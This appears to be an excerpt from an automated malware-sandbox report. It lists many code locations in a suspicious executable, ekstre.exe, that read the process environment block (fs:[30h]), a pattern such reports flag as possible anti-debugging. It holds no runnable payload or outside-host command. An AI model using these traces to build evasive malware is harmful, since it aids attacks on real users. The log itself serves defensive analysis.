Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov ecx, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov ecx, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421F51B mov eax, dword ptr fs:[00000030h]	1_2_3421F51B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A1527 mov eax, dword ptr fs:[00000030h]	1_2_341A1527
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A6540 mov eax, dword ptr fs:[00000030h]	1_2_341A6540
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A8540 mov eax, dword ptr fs:[00000030h]	1_2_341A8540
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417254C mov eax, dword ptr fs:[00000030h]	1_2_3417254C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418E547 mov eax, dword ptr fs:[00000030h]	1_2_3418E547
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423A553 mov eax, dword ptr fs:[00000030h]	1_2_3423A553
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34206550 mov eax, dword ptr fs:[00000030h]	1_2_34206550
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418C560 mov eax, dword ptr fs:[00000030h]	1_2_3418C560
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F9567 mov eax, dword ptr fs:[00000030h]	1_2_341F9567
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3424B55F mov eax, dword ptr fs:[00000030h]	1_2_3424B55F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3424B55F mov eax, dword ptr fs:[00000030h]	1_2_3424B55F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FC592 mov eax, dword ptr fs:[00000030h]	1_2_341FC592
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A2594 mov eax, dword ptr fs:[00000030h]	1_2_341A2594
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE588 mov eax, dword ptr fs:[00000030h]	1_2_341EE588
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE588 mov eax, dword ptr fs:[00000030h]	1_2_341EE588
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AA580 mov eax, dword ptr fs:[00000030h]	1_2_341AA580
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AA580 mov eax, dword ptr fs:[00000030h]	1_2_341AA580
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A9580 mov eax, dword ptr fs:[00000030h]	1_2_341A9580
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A9580 mov eax, dword ptr fs:[00000030h]	1_2_341A9580
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422F582 mov eax, dword ptr fs:[00000030h]	1_2_3422F582
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341745B0 mov eax, dword ptr fs:[00000030h]	1_2_341745B0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341745B0 mov eax, dword ptr fs:[00000030h]	1_2_341745B0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34217591 mov edi, dword ptr fs:[00000030h]	1_2_34217591
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F85AA mov eax, dword ptr fs:[00000030h]	1_2_341F85AA
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A65D0 mov eax, dword ptr fs:[00000030h]	1_2_341A65D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FB5D3 mov eax, dword ptr fs:[00000030h]	1_2_341FB5D3
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3416F5C7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3416F5C7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3416F5C7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3416F5C7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3416F5C7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3416F5C7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3416F5C7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3416F5C7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F5C7 mov eax, dword ptr fs:[00000030h]	1_2_3416F5C7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F05C6 mov eax, dword ptr fs:[00000030h]	1_2_341F05C6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AC5C6 mov eax, dword ptr fs:[00000030h]	1_2_341AC5C6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FC5FC mov eax, dword ptr fs:[00000030h]	1_2_341FC5FC
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A15EF mov eax, dword ptr fs:[00000030h]	1_2_341A15EF
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3417B5E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3417B5E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3417B5E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3417B5E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3417B5E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417B5E0 mov eax, dword ptr fs:[00000030h]	1_2_3417B5E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AA5E7 mov ebx, dword ptr fs:[00000030h]	1_2_341AA5E7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AA5E7 mov eax, dword ptr fs:[00000030h]	1_2_341AA5E7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F55E0 mov eax, dword ptr fs:[00000030h]	1_2_341F55E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421D62C mov ecx, dword ptr fs:[00000030h]	1_2_3421D62C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421D62C mov ecx, dword ptr fs:[00000030h]	1_2_3421D62C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421D62C mov eax, dword ptr fs:[00000030h]	1_2_3421D62C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A360F mov eax, dword ptr fs:[00000030h]	1_2_341A360F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419D600 mov eax, dword ptr fs:[00000030h]	1_2_3419D600
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419D600 mov eax, dword ptr fs:[00000030h]	1_2_3419D600
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F9603 mov eax, dword ptr fs:[00000030h]	1_2_341F9603
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34244600 mov eax, dword ptr fs:[00000030h]	1_2_34244600
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422F607 mov eax, dword ptr fs:[00000030h]	1_2_3422F607
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AF63F mov eax, dword ptr fs:[00000030h]	1_2_341AF63F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AF63F mov eax, dword ptr fs:[00000030h]	1_2_341AF63F
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34170630 mov eax, dword ptr fs:[00000030h]	1_2_34170630
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34203608 mov eax, dword ptr fs:[00000030h]	1_2_34203608
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34203608 mov eax, dword ptr fs:[00000030h]	1_2_34203608
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34203608 mov eax, dword ptr fs:[00000030h]	1_2_34203608
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34203608 mov eax, dword ptr fs:[00000030h]	1_2_34203608
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34203608 mov eax, dword ptr fs:[00000030h]	1_2_34203608
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34203608 mov eax, dword ptr fs:[00000030h]	1_2_34203608
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A0630 mov eax, dword ptr fs:[00000030h]	1_2_341A0630
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F8633 mov esi, dword ptr fs:[00000030h]	1_2_341F8633
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F8633 mov eax, dword ptr fs:[00000030h]	1_2_341F8633
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F8633 mov eax, dword ptr fs:[00000030h]	1_2_341F8633
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34177623 mov eax, dword ptr fs:[00000030h]	1_2_34177623
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34175622 mov eax, dword ptr fs:[00000030h]	1_2_34175622
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34175622 mov eax, dword ptr fs:[00000030h]	1_2_34175622
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AC620 mov eax, dword ptr fs:[00000030h]	1_2_341AC620
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34205660 mov eax, dword ptr fs:[00000030h]	1_2_34205660
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A265C mov eax, dword ptr fs:[00000030h]	1_2_341A265C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A265C mov ecx, dword ptr fs:[00000030h]	1_2_341A265C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A265C mov eax, dword ptr fs:[00000030h]	1_2_341A265C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417965A mov eax, dword ptr fs:[00000030h]	1_2_3417965A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417965A mov eax, dword ptr fs:[00000030h]	1_2_3417965A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A5654 mov eax, dword ptr fs:[00000030h]	1_2_341A5654
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34173640 mov eax, dword ptr fs:[00000030h]	1_2_34173640
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418F640 mov eax, dword ptr fs:[00000030h]	1_2_3418F640
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418F640 mov eax, dword ptr fs:[00000030h]	1_2_3418F640
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418F640 mov eax, dword ptr fs:[00000030h]	1_2_3418F640
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AC640 mov eax, dword ptr fs:[00000030h]	1_2_341AC640
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AC640 mov eax, dword ptr fs:[00000030h]	1_2_341AC640
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416D64A mov eax, dword ptr fs:[00000030h]	1_2_3416D64A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416D64A mov eax, dword ptr fs:[00000030h]	1_2_3416D64A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34170670 mov eax, dword ptr fs:[00000030h]	1_2_34170670
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2670 mov eax, dword ptr fs:[00000030h]	1_2_341B2670
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2670 mov eax, dword ptr fs:[00000030h]	1_2_341B2670
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F166E mov eax, dword ptr fs:[00000030h]	1_2_341F166E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F166E mov eax, dword ptr fs:[00000030h]	1_2_341F166E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F166E mov eax, dword ptr fs:[00000030h]	1_2_341F166E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34167662 mov eax, dword ptr fs:[00000030h]	1_2_34167662
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34167662 mov eax, dword ptr fs:[00000030h]	1_2_34167662
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34167662 mov eax, dword ptr fs:[00000030h]	1_2_34167662
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A666D mov esi, dword ptr fs:[00000030h]	1_2_341A666D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A666D mov eax, dword ptr fs:[00000030h]	1_2_341A666D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A666D mov eax, dword ptr fs:[00000030h]	1_2_341A666D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34183660 mov eax, dword ptr fs:[00000030h]	1_2_34183660
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34183660 mov eax, dword ptr fs:[00000030h]	1_2_34183660
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34183660 mov eax, dword ptr fs:[00000030h]	1_2_34183660
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FE660 mov eax, dword ptr fs:[00000030h]	1_2_341FE660
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341ED69D mov eax, dword ptr fs:[00000030h]	1_2_341ED69D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34178690 mov eax, dword ptr fs:[00000030h]	1_2_34178690
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342386A8 mov eax, dword ptr fs:[00000030h]	1_2_342386A8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342386A8 mov eax, dword ptr fs:[00000030h]	1_2_342386A8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FC691 mov eax, dword ptr fs:[00000030h]	1_2_341FC691
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680 mov eax, dword ptr fs:[00000030h]	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422F68C mov eax, dword ptr fs:[00000030h]	1_2_3422F68C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342056E0 mov eax, dword ptr fs:[00000030h]	1_2_342056E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342056E0 mov eax, dword ptr fs:[00000030h]	1_2_342056E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419D6D0 mov eax, dword ptr fs:[00000030h]	1_2_3419D6D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341706CF mov eax, dword ptr fs:[00000030h]	1_2_341706CF
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423A6C0 mov eax, dword ptr fs:[00000030h]	1_2_3423A6C0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342186C2 mov eax, dword ptr fs:[00000030h]	1_2_342186C2
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EC6F2 mov eax, dword ptr fs:[00000030h]	1_2_341EC6F2
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EC6F2 mov eax, dword ptr fs:[00000030h]	1_2_341EC6F2
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342066D0 mov eax, dword ptr fs:[00000030h]	1_2_342066D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342066D0 mov eax, dword ptr fs:[00000030h]	1_2_342066D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341696E0 mov eax, dword ptr fs:[00000030h]	1_2_341696E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341696E0 mov eax, dword ptr fs:[00000030h]	1_2_341696E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417C6E0 mov eax, dword ptr fs:[00000030h]	1_2_3417C6E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341756E0 mov eax, dword ptr fs:[00000030h]	1_2_341756E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341756E0 mov eax, dword ptr fs:[00000030h]	1_2_341756E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341756E0 mov eax, dword ptr fs:[00000030h]	1_2_341756E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341966E0 mov eax, dword ptr fs:[00000030h]	1_2_341966E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341966E0 mov eax, dword ptr fs:[00000030h]	1_2_341966E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417471B mov eax, dword ptr fs:[00000030h]	1_2_3417471B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417471B mov eax, dword ptr fs:[00000030h]	1_2_3417471B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B705 mov eax, dword ptr fs:[00000030h]	1_2_3416B705
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B705 mov eax, dword ptr fs:[00000030h]	1_2_3416B705
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B705 mov eax, dword ptr fs:[00000030h]	1_2_3416B705
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416B705 mov eax, dword ptr fs:[00000030h]	1_2_3416B705
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419270D mov eax, dword ptr fs:[00000030h]	1_2_3419270D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419270D mov eax, dword ptr fs:[00000030h]	1_2_3419270D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419270D mov eax, dword ptr fs:[00000030h]	1_2_3419270D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417D700 mov ecx, dword ptr fs:[00000030h]	1_2_3417D700
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423970B mov eax, dword ptr fs:[00000030h]	1_2_3423970B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423970B mov eax, dword ptr fs:[00000030h]	1_2_3423970B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422F717 mov eax, dword ptr fs:[00000030h]	1_2_3422F717
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34199723 mov eax, dword ptr fs:[00000030h]	1_2_34199723
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AA750 mov eax, dword ptr fs:[00000030h]	1_2_341AA750
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34192755 mov eax, dword ptr fs:[00000030h]	1_2_34192755
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34192755 mov eax, dword ptr fs:[00000030h]	1_2_34192755
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34192755 mov eax, dword ptr fs:[00000030h]	1_2_34192755
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34192755 mov ecx, dword ptr fs:[00000030h]	1_2_34192755
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34192755 mov eax, dword ptr fs:[00000030h]	1_2_34192755
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34192755 mov eax, dword ptr fs:[00000030h]	1_2_34192755
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F75B mov eax, dword ptr fs:[00000030h]	1_2_3416F75B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F75B mov eax, dword ptr fs:[00000030h]	1_2_3416F75B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F75B mov eax, dword ptr fs:[00000030h]	1_2_3416F75B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F75B mov eax, dword ptr fs:[00000030h]	1_2_3416F75B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F75B mov eax, dword ptr fs:[00000030h]	1_2_3416F75B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F75B mov eax, dword ptr fs:[00000030h]	1_2_3416F75B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F75B mov eax, dword ptr fs:[00000030h]	1_2_3416F75B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F75B mov eax, dword ptr fs:[00000030h]	1_2_3416F75B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F75B mov eax, dword ptr fs:[00000030h]	1_2_3416F75B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A174A mov eax, dword ptr fs:[00000030h]	1_2_341A174A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F174B mov eax, dword ptr fs:[00000030h]	1_2_341F174B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F174B mov ecx, dword ptr fs:[00000030h]	1_2_341F174B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A3740 mov eax, dword ptr fs:[00000030h]	1_2_341A3740
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34174779 mov eax, dword ptr fs:[00000030h]	1_2_34174779
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34174779 mov eax, dword ptr fs:[00000030h]	1_2_34174779
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A0774 mov eax, dword ptr fs:[00000030h]	1_2_341A0774
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421E750 mov eax, dword ptr fs:[00000030h]	1_2_3421E750
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34182760 mov ecx, dword ptr fs:[00000030h]	1_2_34182760
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B1763 mov eax, dword ptr fs:[00000030h]	1_2_341B1763
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B1763 mov eax, dword ptr fs:[00000030h]	1_2_341B1763
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B1763 mov eax, dword ptr fs:[00000030h]	1_2_341B1763
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B1763 mov eax, dword ptr fs:[00000030h]	1_2_341B1763
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B1763 mov eax, dword ptr fs:[00000030h]	1_2_341B1763
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B1763 mov eax, dword ptr fs:[00000030h]	1_2_341B1763
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE79D mov eax, dword ptr fs:[00000030h]	1_2_341EE79D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE79D mov eax, dword ptr fs:[00000030h]	1_2_341EE79D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE79D mov eax, dword ptr fs:[00000030h]	1_2_341EE79D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE79D mov eax, dword ptr fs:[00000030h]	1_2_341EE79D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE79D mov eax, dword ptr fs:[00000030h]	1_2_341EE79D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE79D mov eax, dword ptr fs:[00000030h]	1_2_341EE79D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE79D mov eax, dword ptr fs:[00000030h]	1_2_341EE79D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE79D mov eax, dword ptr fs:[00000030h]	1_2_341EE79D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341EE79D mov eax, dword ptr fs:[00000030h]	1_2_341EE79D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423D7A7 mov eax, dword ptr fs:[00000030h]	1_2_3423D7A7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423D7A7 mov eax, dword ptr fs:[00000030h]	1_2_3423D7A7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423D7A7 mov eax, dword ptr fs:[00000030h]	1_2_3423D7A7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A1796 mov eax, dword ptr fs:[00000030h]	1_2_341A1796
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A1796 mov eax, dword ptr fs:[00000030h]	1_2_341A1796
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342417BC mov eax, dword ptr fs:[00000030h]	1_2_342417BC
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3424B781 mov eax, dword ptr fs:[00000030h]	1_2_3424B781
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3424B781 mov eax, dword ptr fs:[00000030h]	1_2_3424B781
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341707A7 mov eax, dword ptr fs:[00000030h]	1_2_341707A7
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422F7CF mov eax, dword ptr fs:[00000030h]	1_2_3422F7CF
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341777F9 mov eax, dword ptr fs:[00000030h]	1_2_341777F9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341777F9 mov eax, dword ptr fs:[00000030h]	1_2_341777F9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341737E4 mov eax, dword ptr fs:[00000030h]	1_2_341737E4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341737E4 mov eax, dword ptr fs:[00000030h]	1_2_341737E4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341737E4 mov eax, dword ptr fs:[00000030h]	1_2_341737E4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341737E4 mov eax, dword ptr fs:[00000030h]	1_2_341737E4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341737E4 mov eax, dword ptr fs:[00000030h]	1_2_341737E4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341737E4 mov eax, dword ptr fs:[00000030h]	1_2_341737E4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341737E4 mov eax, dword ptr fs:[00000030h]	1_2_341737E4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419E7E0 mov eax, dword ptr fs:[00000030h]	1_2_3419E7E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2010 mov ecx, dword ptr fs:[00000030h]	1_2_341B2010
